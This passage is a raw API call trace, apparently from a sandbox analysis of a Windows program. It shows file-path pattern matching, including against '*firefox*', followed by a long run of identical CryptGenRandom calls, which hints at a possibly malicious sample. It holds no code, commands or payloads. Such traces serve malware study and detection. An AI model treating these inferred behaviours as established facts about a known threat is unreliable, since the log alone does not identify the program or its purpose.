returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*firefox*") returned 0 [0168.330] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc", pszSpec="*") returned 1 [0168.330] strlen (_Str="NMoreira") returned 0x8 [0168.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 